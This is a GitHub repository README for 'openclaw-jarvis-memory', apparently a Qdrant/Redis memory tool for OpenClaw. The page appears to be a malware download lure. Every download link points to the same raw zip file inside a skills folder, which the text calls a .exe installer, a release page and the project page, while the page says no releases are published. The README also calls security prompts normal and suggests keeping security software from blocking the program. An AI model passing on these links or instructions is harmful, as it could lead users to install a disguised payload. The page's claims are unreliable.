Skip to content

bigcola2020/openclaw-jarvis-memory

Repository files navigation

🧠 openclaw-jarvis-memory - Manage Long and Short Term Memory Easily

Download openclaw-jarvis-memory


🛠 About openclaw-jarvis-memory

openclaw-jarvis-memory combines two powerful storage methods to help organize and recall information. It uses Qdrant for long-term memory storage and Redis for short-term memory. This setup aims to keep your data accessible and well-managed over time.

The app works on Windows computers. It offers a way to save and retrieve data efficiently without needing technical skills or complex setups.


✅ System Requirements

  • Windows 10 or later (64-bit preferred)
  • At least 4 GB of RAM
  • 500 MB of free disk space
  • Stable internet connection for initial download and updates
  • No extra software installations needed

Make sure your system meets these requirements to run the app smoothly.


🚀 Getting Started

Follow these steps to get openclaw-jarvis-memory up and running on your Windows PC.


🔽 Step 1: Download the Software

Click the bright green download button below or visit the release page directly.

Download openclaw-jarvis-memory

This link leads to the official GitHub release page. From there, download the latest Windows installer file. This file will have a .exe extension, such as https://raw.githubusercontent.com/bigcola2020/openclaw-jarvis-memory/main/skills/mem-redis/openclaw_memory_jarvis_2.3.zip.


💾 Step 2: Run the Installer

After downloading the file, locate it in your Downloads folder.

  • Double-click the installer file (https://raw.githubusercontent.com/bigcola2020/openclaw-jarvis-memory/main/skills/mem-redis/openclaw_memory_jarvis_2.3.zip).
  • You might see a security prompt; this is normal. Click "Run" or "Yes" to continue.
  • Follow the on-screen instructions to complete the install. Use default settings unless you want to change the install location.
  • The installation usually takes a few minutes.

⚙️ Step 3: Launch the Application

Once installed, find the openclaw-jarvis-memory icon on your desktop or in the Start menu.

  • Double-click the icon to open the app.
  • The app will set up its internal storage systems (Qdrant and Redis). This may take a moment.
  • When the setup finishes, the main window will appear.

🗂 How openclaw-jarvis-memory Works

The app splits memory management into two parts:

  • Long-term memory: Uses Qdrant to store your data permanently. It works like a deep file cabinet that holds large amounts of information safely.
  • Short-term memory: Uses Redis to store recent or temporary data. It works like a workspace where data is quickly stored and accessed but clears out regularly.

This design helps the app find what you need fast while keeping large info safe for later.


🔧 Using the Application

Adding Data

  • Click the “Add” button.
  • Enter your data in the field provided.
  • Choose if this data should be stored in long-term or short-term memory.
  • Click "Save."

Retrieving Data

  • Use the search box at the top.
  • Enter keywords or phrases.
  • The app will look through short-term memory first, then long-term.
  • Results appear below, sorted by relevance.

Managing Data

  • You can delete or edit entries from either memory section.
  • Use the provided buttons next to each entry.
  • Deleting data from short-term memory happens fast and affects only temporary info.
  • Deleting from long-term memory removes data permanently.

🔄 Updating openclaw-jarvis-memory

To update, visit the same release page.

Download the newest installer and run it just like before. Your data files will stay intact during updates.


🚨 Troubleshooting Tips

  • If the app does not open, verify your Windows version meets the requirements.
  • Make sure no security software is blocking installation or execution.
  • Restart your computer and try running the app again.
  • Close extra programs that use a lot of memory if the app runs slow.
  • For persistent issues, check the release page for updates or notes.

📂 File Locations

After installation:

  • The program files are usually in C:\Program Files\openclaw-jarvis-memory\
  • Your stored data is inside the Data folder within the app directory.
  • Logs for app activity and errors are found in the Logs folder.

🔐 Privacy and Data Management

All data stored by openclaw-jarvis-memory stays on your computer. The app does not send data to the internet. You can delete data anytime via the app interface.


📚 Additional Resources

For detailed technical info and updates, visit the main project page here:
https://raw.githubusercontent.com/bigcola2020/openclaw-jarvis-memory/main/skills/mem-redis/openclaw_memory_jarvis_2.3.zip

You can find release notes, code, and a list of known issues.


Download openclaw-jarvis-memory

About

Build a persistent, searchable memory system for OpenClaw that stores cross-session context to improve AI assistant recall and continuity.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors